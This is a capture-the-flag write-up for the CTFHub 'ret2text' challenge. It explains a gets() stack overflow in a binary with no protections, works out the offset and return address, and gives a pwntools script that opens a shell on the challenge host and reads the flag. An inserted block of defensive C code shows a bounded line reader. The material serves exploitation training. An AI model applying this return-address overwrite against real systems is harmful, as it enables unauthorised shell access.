ret2text
2022-07-23 23:32:00 【Long street 395】
Contents
1. What the challenge tests
Basic use of gdb
Understanding the function call stack
Basic use of pwntools
2. Solving the challenge
1. Set up the basic environment
Install gdb: apt-get install build-essential installs the basic build toolchain, which brings gdb in with it.
Install peda: a Python program that extends gdb. Among other things it ships a checksec command, which is used to check a binary's protections.
2. Look at the file
Download the challenge attachment; it is a zip archive. After extracting it, check the basic information:
All protections (CANARY, FORTIFY, NX, PIE) are off, so the challenge needs no complicated bypass. Next, drop the file into IDA and look at the decompiled main function first:
Just simple input and output, with nothing related to the flag. Looking further, there is another function, secure,
which calls system('/bin/sh').
So the guess is that the flag is obtained by executing system to get a shell and then running commands in it.
Approach
Approach 1
From IDA we can see that the pwn program has only these two user functions; the rest are library functions. So the answer lies in these two functions. Stop and think about what we know:
main calls gets() with no limit on the input length, so there is a stack overflow; this is the entry point of the solution
secure calls system('/bin/sh'); this is the exit point of the solution
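The overflow exists only because gets() has no way to learn the buffer's size. As an added illustration that is not code from the write-up or the challenge binary, the block below keeps the vulnerable pattern in a comment and shows a bounded replacement that truncates an over-long line instead of letting it run past the buffer. The function names (read_line_bounded and the two demo helpers), the in-memory test input and the exact return-value convention are my assumptions; the 0x70 buffer size and the 0x78-byte line length are the values from the write-up.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x70   /* same size as the write-up's local at [rbp-0x70] (assumed) */

/* The pattern the write-up describes is, in effect:
 *     char s[BUF_SIZE];
 *     gets(s);    // no bound: a line longer than the buffer keeps writing
 *                 // upward into the saved rbp and the return address
 * gets() cannot be called safely by anyone, which is why C11 removed it. */

/* Bounded replacement: reads at most size-1 bytes into buf, always
 * NUL-terminates, strips the trailing newline, and drains the rest of an
 * over-long line so it does not leak into the next read.
 * Returns 1 if the whole line fit, 0 if it was truncated, -1 on EOF/error. */
int read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    /* No newline in buf: the line was either exactly at the limit or longer.
     * Consume up to the newline so the stream is positioned at the next line. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated ? 0 : 1;
}

/* Demo: feed the bounded reader a constructed 0x78+8 byte line, the length the
 * write-up's payload has. Returns the number of bytes that landed in the
 * buffer when the line was truncated, or -1 if it was not truncated. */
int demo_overlong_line(void)
{
    char s[BUF_SIZE];
    char input[0x78 + 8 + 2];
    memset(input, 'A', 0x78 + 8);
    input[0x78 + 8] = '\n';
    input[0x78 + 8 + 1] = '\0';
    FILE *in = fmemopen(input, strlen(input), "r");
    if (in == NULL)
        return -2;
    int rc = read_line_bounded(s, sizeof s, in);
    fclose(in);
    return rc == 0 ? (int)strlen(s) : -1;   /* 0x6f: buffer intact, nothing past it */
}

/* Demo: a short constructed line is read whole. Returns 1 on success. */
int demo_fitting_line(void)
{
    char s[BUF_SIZE];
    char input[] = "hello\n";
    FILE *in = fmemopen(input, strlen(input), "r");
    if (in == NULL)
        return -2;
    int rc = read_line_bounded(s, sizeof s, in);
    fclose(in);
    return (rc == 1 && strcmp(s, "hello") == 0) ? 1 : -1;
}

int main(void)
{
    printf("over-long line: %d bytes kept (limit %d)\n", demo_overlong_line(), BUF_SIZE - 1);
    printf("fitting line ok: %d\n", demo_fitting_line());
    return 0;
}
```

With the bounded reader in place the 0x78-byte payload stops at 0x6f bytes, so the saved rbp and return address are never reached; the write-up's overflow depends entirely on the unbounded gets().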
Approach 2
The local variable s is filled by user input through gets(); once the input reaches a certain length L, it overwrites the return address (highlighted in yellow in the figure).
If the return address, i.e. the value EIP is loaded with, is made to point at the memory address of the system('/bin/sh') call, we get a shell.
For this, two key values are needed:
the length of data to fill, L: we need to cover EBP
the memory address of the system('/bin/sh') call
Both values can be obtained through dynamic debugging. The steps are as follows:
Step 1: from the disassembly, find the position of the variable: [rbp-0x70]. Since this is a 64-bit binary, covering ebp takes another 8 bytes. So L = 0x70 + 8.
Step 2: again from the disassembly, get the address of the system call. Since the call is complete (the argument is already set up), take the address of the lea instruction: 0x00000000004007b8, i.e. 0x4007b8.
With the two key values in hand, the exploit code can be written.
Code:
from pwn import *
host = 'challenge-ad62e4d28ecb18f6.sandbox.ctfhub.com'
port = 30077
# p = process("./ret2text")   # local test; uncomment this and comment out remote() to debug locally
p = remote(host, port)         # remote challenge instance
payload = b'A' * 0x78 + p64(0x4007b8)  # both parts must be bytes: str and bytes cannot be concatenated
p.sendline(payload)
p.interactive()
Once the shell comes up, read the flag:
cat flag